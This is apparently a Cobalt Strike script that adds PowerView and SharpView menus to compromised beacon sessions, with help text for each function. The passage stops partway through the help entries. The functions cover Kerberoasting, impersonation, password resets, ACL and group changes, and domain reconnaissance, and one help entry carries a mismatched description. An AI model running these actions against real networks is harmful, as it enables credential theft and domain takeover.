PowerView3.cna

# 
# PowerView 3.0 and SharpView Menu for Cobalt Strike
# 
# PowerPick and PowerShell commands requires @harmj0y's PowerView https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# Uses current DEV branch
# Execute-Assembly Requires SharpView https://github.com/tevora-threat/SharpView
#
# If using SharpView make sure the variable $sharviewlocation is set correctly
# 
# Creating a credential object will have the creds be in the command (just like PowerView examples)
#
#
# TODO: Support command piping
#       Not have to edit source to update SharpView location
#

popup beacon_top {
    menu "PowerView 3.0" {
        menu "Misc Functions"{
            item "Export-PowerViewCSV"{
                local('$bid');
                foreach $bid ($1){
                    exportpowerviewcsv($bid);
                }
            }
            item "Resolve-IPAddress"{
                local('$bid');
                foreach $bid ($1){
                    resolveipaddress($bid);
                }
            }
            item "ConvertTo-SID"{
                local('$bid');
                foreach $bid ($1){
                    converttosid($bid);
                }
            }
            item "Convert-ADName"{
                local('$bid');
                foreach $bid ($1){
                    convertadname($bid);
                }
            }
            item "ConvertFrom-UACValue"{
                local('$bid');
                foreach $bid ($1){
                    convertfromuacvalue($bid);
                }
            }
            item "Add-RemoteConnection"{
                local('$bid');
                foreach $bid ($1){
                    addremoteconnection($bid);
                }
            }
            item "Remove-RemoteConnection"{
                local('$bid');
                foreach $bid ($1){
                    removeremoteconnection($bid);
                }
            }
            item "Invoke-UserImpersonation"{
                local('$bid');
                foreach $bid ($1){
                    invokeuserimpersonation($bid);
                }
            }
            item "Invoke-RevertToSelf"{
                local('$bid');
                foreach $bid ($1){
                    invokereverttoself($bid);
                }
            }
            item "Get-DomainSPNTicket"{
                local('$bid');
                foreach $bid ($1){
                    getdomainspnticket($bid);
                }
            }
            item "Invoke-Kerberoast"{
                local('$bid');
                foreach $bid ($1){
                    invokekerberoast($bid);
                }
            }
            item "Get-PathAcl"{
                local('$bid');
                foreach $bid ($1){
                    getpathacl($bid);
                }
            }
        }
        menu "Domain/LDAP Functions"{           
            item "Get-DomainDNSZone"{
                local('$bid');
                foreach $bid ($1){
                    getdomaindnszone($bid);
                }
            }
            item "Get-DomainDNSRecord"{
                local('$bid');
                foreach $bid ($1){
                    getdomaindnsrecord($bid);
                }
            }
            item "Get-Domain"{
                local('$bid');
                foreach $bid ($1){
                    getdomain($bid);
                }
            }
            item "Get-DomainController"{
                local('$bid');
                foreach $bid ($1){
                    getdomaincontroller($bid);
                }
            }
            item "Get-Forest"{
                local('$bid');
                foreach $bid ($1){
                    getforest($bid);
                }
            }
            item "Get-ForestDomain"{
                local('$bid');
                foreach $bid ($1){
                    getforestdomain($bid);
                }
            }
            item "Get-ForestGlobalCatalog"{
                local('$bid');
                foreach $bid ($1){
                    getforestglobalcatalog($bid);
                }
            }
            item "Find-DomainObjectPropertyOutlier"{
                local('$bid');
                foreach $bid ($1){
                    finddomainobjectpropertyoutlier($bid);
                }
            }
            item "Get-DomainUser"{
                local('$bid');
                foreach $bid ($1){
                    getdomainuser($bid);
                }
            }
            item "New-DomainUser"{
                local('$bid');
                foreach $bid ($1){
                    newdomainuser($bid);
                }
            }
            item "Set-DomainUserPassword"{
                local('$bid');
                foreach $bid ($1){
                    setdomainuserpassword($bid);
                }
            }
            item "Get-DomainUserEvent"{
                local('$bid');
                foreach $bid ($1){
                    getdomainuserevent($bid);
                }
            }
            item "Get-DomainComputer"{
                local('$bid');
                foreach $bid ($1){
                    getdomaincomputer($bid);
                }
            }
            item "Get-DomainObject"{
                local('$bid');
                foreach $bid ($1){
                    getdomainobject($bid);
                }
            }
            item "Set-DomainObject"{
                local('$bid');
                foreach $bid ($1){
                    setdomainobject($bid);
                }
            }
            item "Get-DomainObjectAcl"{
                local('$bid');
                foreach $bid ($1){
                    getdomainobjectacl($bid);
                }
            }
            item "Add-DomainObjectAcl"{
                local('$bid');
                foreach $bid ($1){
                    adddomainobjectacl($bid);
                }
            }
            item "Find-InterestingDomainAcl"{
                local('$bid');
                foreach $bid ($1){
                    findinterestingdomainacl($bid);
                }
            }
            item "Get-DomainOU"{
                local('$bid');
                foreach $bid ($1){
                    getdomainou($bid);
                }
            }
            item "Get-DomainSite"{
                local('$bid');
                foreach $bid ($1){
                    getdomainsite($bid);
                }
            }
            item "Get-DomainSubnet"{
                local('$bid');
                foreach $bid ($1){
                    getdomainsubnet($bid);
                }
            }
            item "Get-DomainSID"{
                local('$bid');
                foreach $bid ($1){
                    getdomainsid($bid);
                }
            }
            item "Get-DomainGroup"{
                local('$bid');
                foreach $bid ($1){
                    getdomaingroup($bid);
                }
            }
            item "New-DomainGroup"{
                local('$bid');
                foreach $bid ($1){
                    newdomaingroup($bid);
                }
            }
            item "Get-DomainManagedSecurityGroup"{
                local('$bid');
                foreach $bid ($1){
                    getdomainmanagedsecuritygroup($bid);
                }
            }
            item "Get-DomainGroupMember"{
                local('$bid');
                foreach $bid ($1){
                    getdomaingroupmember($bid);
                }
            }
            item "Add-DomainGroupMember"{
                local('$bid');
                foreach $bid ($1){
                    adddomaingroupmember($bid);
                }
            }
            item "Get-DomainFileServer"{
                local('$bid');
                foreach $bid ($1){
                    getdomainfileserver($bid);
                }
            }
            item "Get-DomainDFSShare"{
                local('$bid');
                foreach $bid ($1){
                    getdomaindfsshare($bid);
                }
            }
        }

        menu "GPO Functions"{           
            item "Get-DomainGPO"{
                local('$bid');
                foreach $bid ($1){
                    getdomaingpo($bid);
                }
            }
            item "Get-DomainGPOLocalGroup"{
                local('$bid');
                foreach $bid ($1){
                    getdomaingpolocalgroup($bid);
                }
            }
            item "Get-DomainGPOUserLocalGroupMapping"{
                local('$bid');
                foreach $bid ($1){
                    getdomaingpouserlocalgroupmapping($bid);
                }
            }
            item "Get-DomainGPOComputerLocalGroupMapping"{
                local('$bid');
                foreach $bid ($1){
                    getdomaingpocomputerlocalgroupmapping($bid);
                }
            }
        }
        menu "Computer Enumeration Functions"{          
            item "Get-DomainPolicy"{
                local('$bid');
                foreach $bid ($1){
                    getdomainpolicy($bid);
                }
            }
            item "Get-NetLocalGroup"{
                local('$bid');
                foreach $bid ($1){
                    getnetlocalgroup($bid);
                }
            }
            item "Get-NetLocalGroupMember"{
                local('$bid');
                foreach $bid ($1){
                    getnetlocalgroupmember($bid);
                }
            }
            item "Get-NetShare"{
                local('$bid');
                foreach $bid ($1){
                    getnetshare($bid);
                }
            }
            item "Get-NetLoggedon"{
                local('$bid');
                foreach $bid ($1){
                    getnetloggedon($bid);
                }
            }
            item "Get-NetSession"{
                local('$bid');
                foreach $bid ($1){
                    getnetsession($bid);
                }
            }
            item "Get-RegLoggedOn"{
                local('$bid');
                foreach $bid ($1){
                    getregloggedon($bid);
                }
            }
            item "Get-NetRDPSession"{
                local('$bid');
                foreach $bid ($1){
                    getnetrdpsession($bid);
                }
            }
            item "Test-AdminAccess"{
                local('$bid');
                foreach $bid ($1){
                    testadminaccess($bid);
                }
            }
            item "Get-NetComputerSiteName"{
                local('$bid');
                foreach $bid ($1){
                    getnetcomputersitename($bid);
                }
            }
            item "Get-WMIRegProxy"{
                local('$bid');
                foreach $bid ($1){
                    getwmiregproxy($bid);
                }
            }
            item "Get-WMIRegLastLoggedOn"{
                local('$bid');
                foreach $bid ($1){
                    getwmireglastloggedon($bid);
                }
            }
            item "Get-WMIRegCachedRDPConnection"{
                local('$bid');
                foreach $bid ($1){
                    getwmiregcachedrdpconnection($bid);
                }
            }
            item "Get-WMIRegMountedDrive"{
                local('$bid');
                foreach $bid ($1){
                    getwmiregmounteddrive($bid);
                }
            }
            item "Get-WMIProcess"{
                local('$bid');
                foreach $bid ($1){
                    getwmiprocess($bid);
                }
            }
            item "Find-InterestingFile"{
                local('$bid');
                foreach $bid ($1){
                    findinterestingfile($bid);
                }
            }
        }
        menu "Threaded Meta-Functions"{         
            item "Find-DomainUserLocation"{
                local('$bid');
                foreach $bid ($1){
                    finddomainuserlocation($bid);
                }
            }
            item "Find-DomainProcess"{
                local('$bid');
                foreach $bid ($1){
                    finddomainprocess($bid);
                }
            }
            item "Find-DomainUserEvent"{
                local('$bid');
                foreach $bid ($1){
                    finddomainuserevent($bid);
                }
            }
            item "Find-DomainShare"{
                local('$bid');
                foreach $bid ($1){
                    finddomainshare($bid);
                }
            }
            item "Find-InterestingDomainShareFile"{
                local('$bid');
                foreach $bid ($1){
                    findinterestingdomainsharefile($bid);
                }
            }
            item "Find-LocalAdminAccess"{
                local('$bid');
                foreach $bid ($1){
                    findlocaladminaccess($bid);
                }
            }
            item "Find-DomainLocalGroupMember"{
                local('$bid');
                foreach $bid ($1){
                    finddomainlocalgroupmember($bid);
                }
            }
        }
        menu "Domain Trust Functions"{          
            item "Get-DomainTrust"{
                local('$bid');
                foreach $bid ($1){
                    getdomaintrust($bid);
                }
            }
            item "Get-ForestTrust"{
                local('$bid');
                foreach $bid ($1){
                    getforesttrust($bid);
                }
            }
            item "Get-DomainForeignUser"{
                local('$bid');
                foreach $bid ($1){
                    getdomainforeignuser($bid);
                }
            }
            item "Get-DomainForeignGroupMember"{
                local('$bid');
                foreach $bid ($1){
                    getdomainforeigngroupmember($bid);
                }
            }
            item "Get-DomainTrustMapping"{
                local('$bid');
                foreach $bid ($1){
                    getdomaintrustmapping($bid);
                }
            }
        }
    }
}

#-------------
# Help Menus
#-------------
sub helpexportpowerviewcsv {
    show_message("
Function:
    Export-PowerViewCSV 

Description:
    Converts a 'DOMAIN\\username' syntax to a security identifier (SID)
    using System.Security.Principal.NTAccount's translate function. If alternate
    credentials are supplied, then Get-ADObject is used to try to map the name
    to a security identifier.

Parameters:
    InputObject: Specifies the objects to export as CSV strings.
    Path: Specifies the path to the CSV output file.
    Delimiter: Specifies a delimiter to separate the property values. The default is a comma (,)
    Append: Indicates that this cmdlet adds the CSV output to the end of the specified file.");
}

sub helpresolveipaddress {
    show_message("
Function:
    Resolve-IPAddress 

Description:
    Resolves a given hostename to its associated IPv4 address using
    [Net.Dns]::GetHostEntry(). If no hostname is provided, the default
    is the IP address of the localhost.");
}

sub helpconverttosid {
    show_message("
Function:
    ConvertTo-SID 

Description:
    Converts a 'DOMAIN\\username' syntax to a security identifier (SID)
    using System.Security.Principal.NTAccount's translate function. If alternate
    credentials are supplied, then Get-ADObject is used to try to map the name

Parameters:
    ObjectName: The user/group name to convert, can be 'user' or 'DOMAIN\\user' format.
    Domain: Specifies the domain to use for the translation, defaults to the current domain.
    Server: Specifies an Active Directory server (domain controller) to bind to for the translation.
    Credential: Specifies an alternate credential to use for the translation.");
}

sub helpconvertadname {
    show_message("
Function:
    Convert-ADName 

Description:
    This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK)
    and translates Active Directory names between various formats using the NameTranslate COM object.

Parameters:
    Identity: Specifies the Active Directory object name to translate, of the following form:
        DN                short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'
        Canonical         canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'
        NT4               domain\\username; e.g., 'fabrikam\\pflynn'
        Display           display name, e.g. 'pflynn'
        DomainSimple      simple domain name format, e.g. 'pflynn@fabrikam.com'
        EnterpriseSimple  simple enterprise name format, e.g. 'pflynn@fabrikam.com'
        GUID              GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'
        UPN               user principal name; e.g., 'pflynn@fabrikam.com'
        CanonicalEx       extended canonical name format
        SPN               service principal name format; e.g. 'HTTP/kairomac.contoso.com'
        SID               Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999'
    OutputType: Specifies the output name type you want to convert to, which must be one of the following:
        DN                short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'
        Canonical         canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'
        NT4               domain\\username; e.g., 'fabrikam\\pflynn'
        Display           display name, e.g. 'pflynn'
        DomainSimple      simple domain name format, e.g. 'pflynn@fabrikam.com'
        EnterpriseSimple  simple enterprise name format, e.g. 'pflynn@fabrikam.com'
        GUID              GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'
        UPN               user principal name; e.g., 'pflynn@fabrikam.com'
        CanonicalEx       extended canonical name format, e.g. 'fabrikam.com/Users/Phineas Flynn'
        SPN               service principal name format; e.g. 'HTTP/kairomac.contoso.com'
    Domain: Specifies the domain to use for the translation, defaults to the current domain.
    Server: Specifies an Active Directory server (domain controller) to bind to for the translation.
    Credential: Specifies an alternate credential to use for the translation.");
}

sub helpconvertfromuacvalue {
    show_message("
Function:
    ConvertFrom-UACValue 

Description:
    This function will take an integer that represents a User Account
    Control (UAC) binary blob and will covert it to an ordered
    dictionary with each bitwise value broken out. By default only values
    set are displayed- the -ShowAll switch will display all values with
    a + next to the ones set.

Parameters:
    Value: Specifies the integer UAC value to convert.
    ShowAll: Switch. Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set.");
}

sub helpaddremoteconnection {
    show_message("
Function:
    Add-RemoteConnection 

Description:
    This function uses WNetAddConnection2W to make a 'temporary' (i.e. not saved) connection
    to the specified remote -Path (\\\\UNC\\share) with the alternate credentials specified in the
    -Credential object. If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC\$.

Parameters:
    ComputerName: Specifies the system to add a \\\\ComputerName\\IPC\$ connection for.
    Path: Specifies the remote \\\\UNC\\path to add the connection for.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpremoveremoteconnection {
    show_message("
Function:
    Remove-RemoteConnection 

Description:
    This function uses WNetCancelConnection2 to destroy a connection created by
    New-RemoteConnection. If a -Path isn't specified, a -ComputerName is required to
    'unmount' \\\\\$ComputerName\\IPC\$.

Parameters:
    ComputerName: Specifies the system to remove a \\\\ComputerName\\IPC\$ connection for.
    Path: Specifies the remote \\\\UNC\\path to remove the connection for.");
}

sub helpinvokeuserimpersonation {
    show_message("
Function:
    Invoke-UserImpersonation 

Description:
    This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType
    to simulate 'runas /netonly'. The resulting token is then impersonated with
    ImpersonateLoggedOnUser() and the token handle is returned for later usage

Parameters:
    Credential: A [Management.Automation.PSCredential] object with alternate credentials
    TokenHandle: An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation.
    Quiet: Suppress any warnings about STA vs MTA.");
}

sub helpinvokereverttoself {
    show_message("
Function:
    Invoke-RevertToSelf 

Description:
    This function uses RevertToSelf() to revert any impersonated tokens.
    If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),
    CloseHandle() is used to close the opened handle.

Parameters:
    TokenHandle: An optional IntPtr TokenHandle returned by Invoke-UserImpersonation.");
}

sub helpgetdomainspnticket {
    show_message("
Function:
    Get-DomainSPNTicket 

Description:
    This function will either take one/more SPN strings, or one/more PowerView.User objects
    (the output from Get-DomainUser) and will request a kerberos ticket for the given SPN
    using System.IdentityModel.Tokens.KerberosRequestorSecurityToken. The encrypted
    portion of the ticket is then extracted and output in either crackable John or Hashcat
    format (deafult of Hashcat).

Parameters:
    SPN: Specifies the service principal name to request the ticket for.
    User: Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for.
    OutputFormat: Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpinvokekerberoast {
    show_message("
Function:
    Invoke-Kerberoast 

Description:
    Uses Get-DomainUser to query for user accounts with non-null service principle
    names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information.

Parameters:
    Identity: A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetpathacl {
    show_message("
Function:
    Get-PathAcl 

Description:
    Enumerates the ACL for a specified file/folder path, and translates
    the access rules for each entry into readable formats. If -Credential is passed,
    Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share.

Parameters:
    Path: Specifies the local or remote path to enumerate the ACLs for.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomaindnszone {
    show_message("
Function:
    Get-DomainDNSZone 

Parameters:
    Domain: The domain to query for zones, defaults to the current domain.
    Server: Specifies an Active Directory server (domain controller) to bind to for the search.
    Properties: Specifies the properties of the output object to retrieve from the server.
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    FindOne: Only return one result object.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomaindnsrecord {
    show_message("
Function:
    Get-DomainDNSRecord 

Description:
    Given a specific Active Directory DNS zone name, query for all 'dnsNode'
    LDAP entries using that zone as the search base. Return all DNS entry results
    and use Convert-DNSRecord to try to convert the binary DNS record blobs.

Parameters:
    ZoneName: Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone).
    Domain: The domain to query for zones, defaults to the current domain.
    Server: Specifies an Active Directory server (domain controller) to bind to for the search.
    Properties: Specifies the properties of the output object to retrieve from the server.
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    FindOne: Only return one result object.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomain {
    show_message("
Function:
    Get-Domain 

Description:
    Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current
    domain or the domain specified with -Domain X.

Parameters:
    Domain: Specifies the domain name to query for, defaults to the current domain.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomaincontroller {
    show_message("
Function:
    Get-DomainController 

Description:
    Enumerates the domain controllers for the current or specified domain.
    By default built in .NET methods are used. The -LDAP switch uses Get-DomainComputer
    to search for domain controllers.

Parameters:
    Domain: The domain to query for domain controllers, defaults to the current domain.
    Server: Specifies an Active Directory server (domain controller) to bind to.
    LDAP: Switch. Use LDAP queries to determine the domain controllers instead of built in .NET methods.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetforest {
    show_message("
Function:
    Get-Forest 

Description:
    Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current
    forest or the forest specified with -Forest X.

Parameters:
    Forest: The forest name to query for, defaults to the current forest.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetforestdomain {
    show_message("
Function:
    Get-ForestDomain 

Description:
    Returns all domains for the current forest or the forest specified
    by -Forest X.

Parameters:
    Forest: Specifies the forest name to query for domains.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetforestglobalcatalog {
    show_message("
Function:
    Get-ForestGlobalCatalog 

Description:
    Returns all global catalogs for the current forest or the forest specified
    by -Forest X by using Get-Forest to retrieve the specified forest object
    and the .FindAllGlobalCatalogs() to enumerate the global catalogs.

Parameters:
    Forest: Specifies the forest name to query for global catalogs.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpfinddomainobjectpropertyoutlier {
    show_message("
Function:
    Find-DomainObjectPropertyOutlier 

Description:
    A 'reference' set of property names is calculated, either from a standard set preserved
    for user/group/computers, or from the array of names passed to -ReferencePropertySet, or
    from the property names of the passed -ReferenceObject. Every user/group/computer object
    (depending on determined class) are enumerated, and for each object, if the object has a
    'non-standard' property set (meaning a property not held by the reference set), the object's
    samAccountName, property name, and property value are output to the pipeline.

Parameters:
    ClassName: Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'.
    ReferencePropertySet: Specifies an array of property names to diff against the class schema.
    ReferenceObject: Specicifes the PowerView user/group/computer object to extract property names
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomainuser {
    show_message("
Function:
    Get-DomainUser 

Description:
    Builds a directory searcher object using Get-DomainSearcher, builds a custom
    LDAP filter based on targeting/filter parameters, and searches for all objects
    matching the criteria. To only return specific properties, use
    '-Properties samaccountname,usnchanged,...'. By default, all user objects for
    the current domain are returned.

Parameters:
    Identity: A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
    SPN: Switch. Only return user objects with non-null service principal names.
    UACFilter: Dynamic parameter that accepts one or more values from $UACEnum, including
    AdminCount: Switch. Return users with '(adminCount=1)' (meaning are/were privileged).
    AllowDelegation: Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation'
    DisallowDelegation: Switch. Return user accounts that are marked as 'sensitive and not allowed for delegation'
    TrustedToAuth: Switch. Return computer objects that are trusted to authenticate for other principals.
    PreauthNotRequired: Switch. Return user accounts with 'Do not require Kerberos preauthentication' set.
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    Properties: Specifies the properties of the output object to retrieve from the server.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    SecurityMasks: Specifies an option for examining security information of a directory object.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    FindOne: Only return one result object.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    Raw: Switch. Return raw results instead of translating the fields into a custom PSObject.");
}

sub helpnewdomainuser {
    show_message("
Function:
    New-DomainUser 

Description:
    First binds to the specified domain context using Get-PrincipalContext.
    The bound domain context is then used to create a new
    DirectoryServices.AccountManagement.UserPrincipal with the specified user properties.

Parameters:
    SamAccountName: Specifies the Security Account Manager (SAM) account name of the user to create.
    AccountPassword: Specifies the password for the created user. Mandatory.
    Name: Specifies the name of the user to create. If not provided, defaults to SamAccountName.
    DisplayName: Specifies the display name of the user to create. If not provided, defaults to SamAccountName.
    Description: Specifies the description of the user to create.
    Domain: Specifies the domain to use to search for user/group principals, defaults to the current domain.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpsetdomainuserpassword {
    show_message("
Function:
    Set-DomainUserPassword 

Description:
    First binds to the specified domain context using Get-PrincipalContext.
    The bound domain context is then used to search for the specified user -Identity,
    which returns a DirectoryServices.AccountManagement.UserPrincipal object. The
    SetPassword() function is then invoked on the user, setting the password to -AccountPassword.

Parameters:
    Identity: A user SamAccountName (e.g. User1), DistinguishedName (e.g. CN=user1,CN=Users,DC=testlab,DC=local),
    AccountPassword: Specifies the password to reset the target user's to. Mandatory.
    Domain: Specifies the domain to use to search for the user identity, defaults to the current domain.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomainuserevent {
    show_message("
Function:
    Get-DomainUserEvent 

Description:
    This function uses an XML path filter passed to Get-WinEvent to retrieve
    security events with IDs of 4624 (logon events) or 4648 (explicit credential
    logon events) from -StartTime (default of now-1 day) to -EndTime (default of now).

Parameters:
    ComputerName: Specifies the computer name to retrieve events from, default of localhost.
    StartTime: The [DateTime] object representing the start of when to collect events.
    EndTime: The [DateTime] object representing the end of when to collect events.
    MaxEvents: The maximum number of events to retrieve. Default of 5000.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomaincomputer {
    show_message("
Function:
    Get-DomainComputer 

Description:
    Builds a directory searcher object using Get-DomainSearcher, builds a custom
    LDAP filter based on targeting/filter parameters, and searches for all objects
    matching the criteria. To only return specific properties, use
    '-Properties samaccountname,usnchanged,...'. By default, all computer objects for
    the current domain are returned.

Parameters:
    Identity: A SamAccountName (e.g. WINDOWS10\$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
    UACFilter: Dynamic parameter that accepts one or more values from $UACEnum, including
    Unconstrained: Switch. Return computer objects that have unconstrained delegation.
    TrustedToAuth: Switch. Return computer objects that are trusted to authenticate for other principals.
    Printers: Switch. Return only printers.
    SPN: Return computers with a specific service principal name, wildcards accepted.
    OperatingSystem: Return computers with a specific operating system, wildcards accepted.
    ServicePack: Return computers with a specific service pack, wildcards accepted.
    SiteName: Return computers in the specific AD Site name, wildcards accepted.
    Ping: Switch. Ping each host to ensure it's up before enumerating.
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    Properties: Specifies the properties of the output object to retrieve from the server.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    SecurityMasks: Specifies an option for examining security information of a directory object.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    FindOne: Only return one result object.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    Raw: Switch. Return raw results instead of translating the fields into a custom PSObject.");
}

sub helpgetdomainobject {
    show_message("
Function:
    Get-DomainObject 

Description:
    Builds a directory searcher object using Get-DomainSearcher, builds a custom
    LDAP filter based on targeting/filter parameters, and searches for all objects
    matching the criteria. To only return specific properties, use
    '-Properties samaccountname,usnchanged,...'. By default, all objects for
    the current domain are returned.

Parameters:
    Identity: A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
    UACFilter: Dynamic parameter that accepts one or more values from $UACEnum, including
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    Properties: Specifies the properties of the output object to retrieve from the server.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).   
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object. 
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.  
    SecurityMasks: Specifies an option for examining security information of a directory object.    
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.   
    FindOne: Only return one result object.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    Raw: Switch. Return raw results instead of translating the fields into a custom PSObject.");
}

sub helpsetdomainobject {
    show_message("
Function:
    Set-DomainObject 

Description:
    Splats user/object targeting parameters to Get-DomainObject, returning the raw
    searchresult object. Retrieves the raw directoryentry for the object, and sets
    any values from -Set @{}, XORs any values from -XOR @{}, and clears any values

Parameters:
    Identity: A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
    Set: Specifies values for one or more object properties (in the form of a hashtable) that will replace the current values.
    XOR: Specifies values for one or more object properties (in the form of a hashtable) that will XOR the current values.
    Clear: Specifies an array of object properties that will be cleared in the directory.
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.   
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomainobjectacl {
    show_message("
Function:
    Get-DomainObjectAcl 

Parameters:
    Identity: A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
    Sacl: Switch. Return the SACL instead of the DACL for the object (default behavior).
    ResolveGUIDs: Switch. Resolve GUIDs to their display names.
    RightsFilter: A specific set of rights to return ('All', 'ResetPassword', 'WriteMembers').
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
